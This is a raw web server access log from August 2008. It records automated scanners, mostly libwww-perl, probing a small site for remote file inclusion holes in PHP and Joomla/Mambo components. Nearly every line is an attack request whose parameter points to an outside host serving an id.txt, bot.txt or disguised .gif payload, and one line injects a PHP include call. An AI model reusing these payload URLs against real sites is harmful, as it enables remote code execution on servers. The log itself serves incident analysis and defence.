64.185.237.191 - - [27/Aug/2008:03:22:04 -0700] "GET /logs//doceboCms/class/class.dashboard_cms.php?where_framework=http://asc01.extra.hu/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.danjtams.com"
92.51.145.83 - - [27/Aug/2008:03:22:16 -0700] "GET /logs/access.log//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://scaneru.nm.ru/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.danjtams.com"
92.51.145.83 - - [27/Aug/2008:03:22:16 -0700] "GET //index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://scaneru.nm.ru/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.danjtams.com"
92.51.145.83 - - [27/Aug/2008:03:22:17 -0700] "GET /logs//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://scaneru.nm.ru/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.danjtams.com"
92.51.145.83 - - [27/Aug/2008:03:22:22 -0700] "GET /logs/access.log//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://scaneru.nm.ru/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.danjtams.com"
92.51.145.83 - - [27/Aug/2008:03:22:22 -0700] "GET /logs//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://scaneru.nm.ru/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.danjtams.com"
92.51.145.83 - - [27/Aug/2008:03:22:22 -0700] "GET //index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://scaneru.nm.ru/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.danjtams.com"
65.254.58.42 - - [27/Aug/2008:03:24:29 -0700] "GET /logs/access_080724.log/bookmark4u/lostpasswd.php?env[include_prefix]=http://www.posmac.nl/templates/sistem.gif??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.danjtams.com"
195.15.2.85 - - [27/Aug/2008:03:24:52 -0700] "GET /logs/access_080724.log/errors.php?error=http://asc01.extra.hu/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.danjtams.com"
74.53.243.226 - - [27/Aug/2008:03:25:01 -0700] "GET /logs/access.log/components/com_facileforms/facileforms.frame.php?ff_compath=http://dkp.atrummortis.com/images/glyphs/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.danjtams.com"
74.53.243.226 - - [27/Aug/2008:03:25:01 -0700] "GET /logs/components/com_facileforms/facileforms.frame.php?ff_compath=http://dkp.atrummortis.com/images/glyphs/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.danjtams.com"
74.53.243.226 - - [27/Aug/2008:03:25:01 -0700] "GET /components/com_facileforms/facileforms.frame.php?ff_compath=http://dkp.atrummortis.com/images/glyphs/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.danjtams.com"
195.15.2.85 - - [27/Aug/2008:03:25:05 -0700] "GET /errors.php?error=http://asc01.extra.hu/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.danjtams.com"
195.15.2.85 - - [27/Aug/2008:03:25:06 -0700] "GET /logs/errors.php?error=http://asc01.extra.hu/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.danjtams.com"
195.15.2.85 - - [27/Aug/2008:03:25:24 -0700] "GET /logs/access_080722.log/errors.php?error=http://asc01.extra.hu/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.danjtams.com"
92.51.145.83 - - [27/Aug/2008:03:25:31 -0700] "GET /logs/access_080722.log//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://scaneru.nm.ru/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.danjtams.com"
64.185.237.191 - - [27/Aug/2008:03:25:45 -0700] "GET /logs/access.log//?path%5Bdocroot%5D=http://asc01.extra.hu/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.danjtams.com"
64.185.237.191 - - [27/Aug/2008:03:25:46 -0700] "GET //?path%5Bdocroot%5D=http://asc01.extra.hu/id.txt?? HTTP/1.1" 200 779 "-" "libwww-perl/5.810" "www.danjtams.com"
64.185.237.191 - - [27/Aug/2008:03:25:46 -0700] "GET /logs//?path%5Bdocroot%5D=http://asc01.extra.hu/id.txt?? HTTP/1.1" 200 1372 "-" "libwww-perl/5.810" "www.danjtams.com"
84.54.137.9 - - [27/Aug/2008:03:26:50 -0700] "GET /logs/access_080715.log//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://carrentalguru.com//templates/%20%20%20%20%20%20%20/sistem.gif??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.danjtams.com"
66.225.211.236 - - [27/Aug/2008:03:27:12 -0700] "GET /logs/access.log//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.battle-elite.de/be_inside/images/cicons/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.danjtams.com"
66.225.211.236 - - [27/Aug/2008:03:27:12 -0700] "GET //index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.battle-elite.de/be_inside/images/cicons/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.danjtams.com"
66.225.211.236 - - [27/Aug/2008:03:27:12 -0700] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.battle-elite.de/be_inside/images/cicons/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.danjtams.com"
209.126.254.80 - - [27/Aug/2008:03:27:36 -0700] "GET /logs/access.log//galeria.php?start=0&kategoria=http://www.correiios.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.danjtams.com"
209.126.254.80 - - [27/Aug/2008:03:27:36 -0700] "GET //galeria.php?start=0&kategoria=http://www.correiios.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.danjtams.com"
209.126.254.80 - - [27/Aug/2008:03:27:37 -0700] "GET /logs//galeria.php?start=0&kategoria=http://www.correiios.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.danjtams.com"
74.53.243.226 - - [27/Aug/2008:03:28:17 -0700] "GET /logs/components/com_zoom/includes/database.php?mosConfig_absolute_path=http://dkp.atrummortis.com/images/glyphs/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.danjtams.com"
74.53.243.226 - - [27/Aug/2008:03:28:18 -0700] "GET /logs/access.log/components/com_zoom/includes/database.php?mosConfig_absolute_path=http://dkp.atrummortis.com/images/glyphs/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.danjtams.com"
74.53.243.226 - - [27/Aug/2008:03:28:18 -0700] "GET /components/com_zoom/includes/database.php?mosConfig_absolute_path=http://dkp.atrummortis.com/images/glyphs/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.danjtams.com"
65.38.169.228 - - [27/Aug/2008:03:28:38 -0700] "GET /logs/access_080715.log//admin/business_inc/saveserver.php?thisdir=http://www.slupskie-studia-filozoficzne.apsl.edu.pl/cache/ids.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.danjtams.com"
74.53.243.226 - - [27/Aug/2008:03:29:05 -0700] "GET /logs/access.log%20/components/com_facileforms/facileforms.frame.php?ff_compath=http://dkp.atrummortis.com/images/glyphs/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.danjtams.com"
82.194.76.177 - - [27/Aug/2008:03:29:05 -0700] "GET ///modules/Forums/admin/errors.php?error=http://audi.spb.ru/img/gal/2008/bot.txt?? HTTP/1.1" 404 275 "-" "Avant Browser (http://www.avantbrowser.com)" "www.danjtams.com"
82.194.76.177 - - [27/Aug/2008:03:29:05 -0700] "GET /logs///modules/Forums/admin/errors.php?error=http://audi.spb.ru/img/gal/2008/bot.txt?? HTTP/1.1" 404 275 "-" "Avant Browser (http://www.avantbrowser.com)" "www.danjtams.com"
64.185.237.191 - - [27/Aug/2008:03:29:19 -0700] "GET /logs/access_080715.log//config/dbutil.bck.php?confdir=http://asc01.extra.hu/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.danjtams.com"
205.234.186.117 - - [27/Aug/2008:03:29:21 -0700] "GET /logs/access.log//?path%5Bdocroot%5D=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.danjtams.com"
205.234.186.117 - - [27/Aug/2008:03:29:21 -0700] "GET //?path%5Bdocroot%5D=http://poko.club.hu/id1.txt?? HTTP/1.1" 200 779 "-" "libwww-perl/5.810" "www.danjtams.com"
205.234.186.117 - - [27/Aug/2008:03:29:21 -0700] "GET /logs//?path%5Bdocroot%5D=http://poko.club.hu/id1.txt?? HTTP/1.1" 200 1372 "-" "libwww-perl/5.810" "www.danjtams.com"
205.234.186.117 - - [27/Aug/2008:03:30:17 -0700] "GET /logs/scripts.log//admin/classes/errors.php?error=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.danjtams.com"
67.19.6.34 - - [27/Aug/2008:03:31:12 -0700] "GET //weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.madmikesradio.net/PG/gallery/albums/userpics/themes.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.danjtams.com"
85.214.88.11 - - [27/Aug/2008:03:31:59 -0700] "GET /logs/access.log//?path%5Bdocroot%5D=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.danjtams.com"
85.214.88.11 - - [27/Aug/2008:03:32:00 -0700] "GET //?path%5Bdocroot%5D=http://poko.club.hu/id1.txt?? HTTP/1.1" 200 779 "-" "libwww-perl/5.803" "www.danjtams.com"
85.214.88.11 - - [27/Aug/2008:03:32:00 -0700] "GET /logs//?path%5Bdocroot%5D=http://poko.club.hu/id1.txt?? HTTP/1.1" 200 1372 "-" "libwww-perl/5.803" "www.danjtams.com"
74.53.243.226 - - [27/Aug/2008:03:32:09 -0700] "GET /administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://dkp.atrummortis.com/images/glyphs/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.danjtams.com"
74.53.243.226 - - [27/Aug/2008:03:32:09 -0700] "GET /logs/access.log/administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://dkp.atrummortis.com/images/glyphs/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.danjtams.com"
74.53.243.226 - - [27/Aug/2008:03:32:09 -0700] "GET /logs/administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://dkp.atrummortis.com/images/glyphs/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.danjtams.com"
85.234.212.3 - - [27/Aug/2008:03:32:20 -0700] "GET /logs/access_080717.log//include/admin.lib.inc.php?site_path=http://asc01.extra.hu/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.danjtams.com"
64.185.237.191 - - [27/Aug/2008:03:32:27 -0700] "GET /logs/access.log//doceboCms/class/class.dashboard_cms.php?where_framework=http://asc01.extra.hu/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.danjtams.com"
64.185.237.191 - - [27/Aug/2008:03:32:28 -0700] "GET //doceboCms/class/class.dashboard_cms.php?where_framework=http://asc01.extra.hu/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.danjtams.com"
64.185.237.191 - - [27/Aug/2008:03:32:31 -0700] "GET /logs//doceboCms/class/class.dashboard_cms.php?where_framework=http://asc01.extra.hu/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.danjtams.com"
64.185.237.191 - - [27/Aug/2008:03:32:45 -0700] "GET /logs/access_080724.log/phphtml.php?htmlclass_path=http://asc01.extra.hu/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.danjtams.com"
65.38.169.228 - - [27/Aug/2008:03:33:05 -0700] "GET /logs/access.log%20//admin/business_inc/saveserver.php?thisdir=http://www.slupskie-studia-filozoficzne.apsl.edu.pl/cache/ids.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.danjtams.com"
201.6.251.5 - - [27/Aug/2008:03:34:15 -0700] "GET /logs/access.log//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.correiios.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.danjtams.com"
201.6.251.5 - - [27/Aug/2008:03:34:15 -0700] "GET //ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.correiios.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.danjtams.com"
201.6.251.5 - - [27/Aug/2008:03:34:16 -0700] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.correiios.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.danjtams.com"
67.19.6.34 - - [27/Aug/2008:03:34:45 -0700] "GET /logs/access.log//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.madmikesradio.net/PG/gallery/albums/userpics/themes.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.danjtams.com"
67.19.6.34 - - [27/Aug/2008:03:34:45 -0700] "GET //weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.madmikesradio.net/PG/gallery/albums/userpics/themes.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.danjtams.com"
67.19.6.34 - - [27/Aug/2008:03:34:45 -0700] "GET /logs//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.madmikesradio.net/PG/gallery/albums/userpics/themes.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.danjtams.com"
77.221.130.3 - - [27/Aug/2008:03:35:21 -0700] "GET /logs/access_080715.log//Neos_Chronos/header.php?base_folder=http://albgroup.webng.com/Id/rd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.danjtams.com"
77.221.130.3 - - [27/Aug/2008:03:35:21 -0700] "GET //Neos_Chronos/header.php?base_folder=http://albgroup.webng.com/Id/rd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.danjtams.com"
77.221.130.3 - - [27/Aug/2008:03:35:21 -0700] "GET /logs//Neos_Chronos/header.php?base_folder=http://albgroup.webng.com/Id/rd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.danjtams.com"
66.225.211.236 - - [27/Aug/2008:03:36:48 -0700] "GET /logs/access_080724.log/components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.battle-elite.de/be_inside/images/cicons/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.danjtams.com"
64.185.237.191 - - [27/Aug/2008:03:38:16 -0700] "GET /?sourcedir=http://asc01.extra.hu/id.txt?? HTTP/1.1" 200 779 "-" "libwww-perl/5.810" "www.danjtams.com"
64.185.237.191 - - [27/Aug/2008:03:38:17 -0700] "GET /logs/?sourcedir=http://asc01.extra.hu/id.txt?? HTTP/1.1" 200 1367 "-" "libwww-perl/5.810" "www.danjtams.com"
69.9.8.181 - - [27/Aug/2008:03:38:28 -0700] "GET /logs/access.log//components/com_flyspray/startdown.php?file=http://www.correiios.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.danjtams.com"
69.9.8.181 - - [27/Aug/2008:03:38:28 -0700] "GET //components/com_flyspray/startdown.php?file=http://www.correiios.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.danjtams.com"
69.9.8.181 - - [27/Aug/2008:03:38:28 -0700] "GET /logs//components/com_flyspray/startdown.php?file=http://www.correiios.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.danjtams.com"
64.185.237.191 - - [27/Aug/2008:03:38:29 -0700] "GET /logs/access.log/?sourcedir=http://asc01.extra.hu/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.danjtams.com"
64.185.237.191 - - [27/Aug/2008:03:38:36 -0700] "GET /logs/access.log//convert/mvcw.php?step=1&vwar_root=http://asc01.extra.hu/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.danjtams.com"
64.185.237.191 - - [27/Aug/2008:03:38:39 -0700] "GET //convert/mvcw.php?step=1&vwar_root=http://asc01.extra.hu/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.danjtams.com"
92.51.145.83 - - [27/Aug/2008:03:39:14 -0700] "GET //e404.php?DOCUMENT_ROOT=http://scaneru.nm.ru/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.danjtams.com"
92.51.145.83 - - [27/Aug/2008:03:39:15 -0700] "GET /logs/access.log//e404.php?DOCUMENT_ROOT=http://scaneru.nm.ru/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.danjtams.com"
92.51.145.83 - - [27/Aug/2008:03:39:15 -0700] "GET /logs//e404.php?DOCUMENT_ROOT=http://scaneru.nm.ru/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.danjtams.com"
87.230.81.72 - - [27/Aug/2008:03:40:21 -0700] "GET /logs/access.log/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://spiritualcultivation.com/modules/id.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.danjtams.com"
87.230.81.72 - - [27/Aug/2008:03:40:23 -0700] "GET /public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://spiritualcultivation.com/modules/id.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.danjtams.com"
87.230.81.72 - - [27/Aug/2008:03:40:24 -0700] "GET /logs/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://spiritualcultivation.com/modules/id.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.danjtams.com"
74.55.136.66 - - [27/Aug/2008:03:41:09 -0700] "GET /logs/access.log/errors.php?error=http://www.all-cs.ru/files/data/media/73/osy2.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.danjtams.com"
74.55.136.66 - - [27/Aug/2008:03:41:09 -0700] "GET /errors.php?error=http://www.all-cs.ru/files/data/media/73/osy2.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.danjtams.com"
74.55.136.66 - - [27/Aug/2008:03:41:21 -0700] "GET /logs/access.log/errors.php?error=http://www.all-cs.ru/files/data/media/73/osy2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.danjtams.com"
74.55.136.66 - - [27/Aug/2008:03:41:21 -0700] "GET /errors.php?error=http://www.all-cs.ru/files/data/media/73/osy2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.danjtams.com"
74.55.136.66 - - [27/Aug/2008:03:41:22 -0700] "GET /logs/errors.php?error=http://www.all-cs.ru/files/data/media/73/osy2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.danjtams.com"
67.19.87.58 - - [27/Aug/2008:03:43:00 -0700] "GET /logs/access_080722.log//s_loadenv.inc.php?DOCUMENT_ROOT=http://albgroup.webng.com/Id/vid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.danjtams.com"
67.19.87.58 - - [27/Aug/2008:03:43:00 -0700] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://albgroup.webng.com/Id/vid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.danjtams.com"
67.19.87.58 - - [27/Aug/2008:03:43:00 -0700] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://albgroup.webng.com/Id/vid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.danjtams.com"
74.55.136.66 - - [27/Aug/2008:03:43:45 -0700] "GET /errors.php?error=http://www.all-cs.ru/files/data/media/73/osy2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.danjtams.com"
66.225.211.236 - - [27/Aug/2008:03:43:50 -0700] "GET /logs/access.log//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.battle-elite.de/be_inside/images/cicons/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.danjtams.com"
66.225.211.236 - - [27/Aug/2008:03:43:50 -0700] "GET //bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.battle-elite.de/be_inside/images/cicons/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.danjtams.com"
66.225.211.236 - - [27/Aug/2008:03:43:50 -0700] "GET /logs//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.battle-elite.de/be_inside/images/cicons/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.danjtams.com"
64.185.237.191 - - [27/Aug/2008:03:45:02 -0700] "GET /logs/access.log//config/dbutil.bck.php?confdir=http://asc01.extra.hu/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.danjtams.com"
64.185.237.191 - - [27/Aug/2008:03:45:03 -0700] "GET //config/dbutil.bck.php?confdir=http://asc01.extra.hu/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.danjtams.com"
64.185.237.191 - - [27/Aug/2008:03:45:03 -0700] "GET /logs//config/dbutil.bck.php?confdir=http://asc01.extra.hu/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.danjtams.com"
87.230.81.72 - - [27/Aug/2008:03:46:34 -0700] "GET /logs/access.log/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://spiritualcultivation.com/modules/id.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.danjtams.com"
87.230.81.72 - - [27/Aug/2008:03:46:35 -0700] "GET /public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://spiritualcultivation.com/modules/id.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.danjtams.com"
87.230.81.72 - - [27/Aug/2008:03:46:35 -0700] "GET /logs/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://spiritualcultivation.com/modules/id.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.danjtams.com"
212.227.65.79 - - [27/Aug/2008:03:49:52 -0700] "GET /logs/access_080722.log//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://moop.moomoo.co.il/sdsdf.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.danjtams.com"
212.227.65.79 - - [27/Aug/2008:03:49:52 -0700] "GET /logs/access_080722.log//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.fsj-sh.de//images/stories/desmodos.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.danjtams.com"
74.53.243.226 - - [27/Aug/2008:03:51:31 -0700] "GET /components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://dkp.atrummortis.com/images/glyphs/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.danjtams.com"
74.53.243.226 - - [27/Aug/2008:03:51:31 -0700] "GET /logs/access.log/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://dkp.atrummortis.com/images/glyphs/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.danjtams.com"
74.53.243.226 - - [27/Aug/2008:03:51:32 -0700] "GET /logs/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://dkp.atrummortis.com/images/glyphs/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.danjtams.com"
201.17.129.24 - - [27/Aug/2008:03:51:53 -0700] "GET /logs/access.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://desterrr.altervista.org/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.danjtams.com"
201.17.129.24 - - [27/Aug/2008:03:51:58 -0700] "GET //includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://desterrr.altervista.org/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.danjtams.com"
201.17.129.24 - - [27/Aug/2008:03:52:02 -0700] "GET /logs//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://desterrr.altervista.org/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.danjtams.com"
77.221.130.3 - - [27/Aug/2008:03:52:25 -0700] "GET /logs/access_080730.log//Neos_Chronos/header.php?base_folder=http://albgroup.webng.com/Id/rd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.danjtams.com"
74.55.136.66 - - [27/Aug/2008:03:52:39 -0700] "GET /logs/scripts.log/errors.php?error=http://www.all-cs.ru/files/data/media/73/osy2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.danjtams.com"
74.53.243.226 - - [27/Aug/2008:03:52:39 -0700] "GET /logs/access.log/modules/vwar/admin/admin.php?vwar_root=http://dkp.atrummortis.com/images/glyphs/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.danjtams.com"
74.53.243.226 - - [27/Aug/2008:03:52:39 -0700] "GET /modules/vwar/admin/admin.php?vwar_root=http://dkp.atrummortis.com/images/glyphs/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.danjtams.com"
74.53.243.226 - - [27/Aug/2008:03:52:39 -0700] "GET /logs/modules/vwar/admin/admin.php?vwar_root=http://dkp.atrummortis.com/images/glyphs/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.danjtams.com"
201.17.129.24 - - [27/Aug/2008:03:53:22 -0700] "GET /logs/access.log//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://desterrr.altervista.org/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.danjtams.com"
201.17.129.24 - - [27/Aug/2008:03:53:22 -0700] "GET /logs/access.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://desterrr.altervista.org/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.danjtams.com"
200.49.100.20 - - [27/Aug/2008:03:53:24 -0700] "GET /logs/access.log/netcat/htmledit//index.php?DOCUMENT_ROOT=http://veldink.com/mine/lajelid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.danjtams.com"
200.49.100.20 - - [27/Aug/2008:03:53:24 -0700] "GET /logs/netcat/htmledit//index.php?DOCUMENT_ROOT=http://veldink.com/mine/lajelid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.danjtams.com"
200.49.100.20 - - [27/Aug/2008:03:53:25 -0700] "GET /netcat/htmledit//index.php?DOCUMENT_ROOT=http://veldink.com/mine/lajelid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.danjtams.com"
201.17.129.24 - - [27/Aug/2008:03:53:26 -0700] "GET //index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://desterrr.altervista.org/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.danjtams.com"
201.17.129.24 - - [27/Aug/2008:03:53:27 -0700] "GET //includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://desterrr.altervista.org/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.danjtams.com"
87.230.81.72 - - [27/Aug/2008:03:53:31 -0700] "GET //index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://septimamaipu.cl/septima/mambots/idv6.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.danjtams.com"
87.230.81.72 - - [27/Aug/2008:03:53:31 -0700] "GET /logs/access.log//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://septimamaipu.cl/septima/mambots/idv6.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.danjtams.com"
87.230.81.72 - - [27/Aug/2008:03:53:31 -0700] "GET /logs//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://septimamaipu.cl/septima/mambots/idv6.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.danjtams.com"
201.17.129.24 - - [27/Aug/2008:03:53:32 -0700] "GET /logs//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://desterrr.altervista.org/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.danjtams.com"
201.17.129.24 - - [27/Aug/2008:03:53:33 -0700] "GET /logs//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://desterrr.altervista.org/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.danjtams.com"
74.53.243.226 - - [27/Aug/2008:03:54:25 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://dkp.atrummortis.com/images/glyphs/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.danjtams.com"
74.53.243.226 - - [27/Aug/2008:03:54:25 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://dkp.atrummortis.com/images/glyphs/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.danjtams.com"
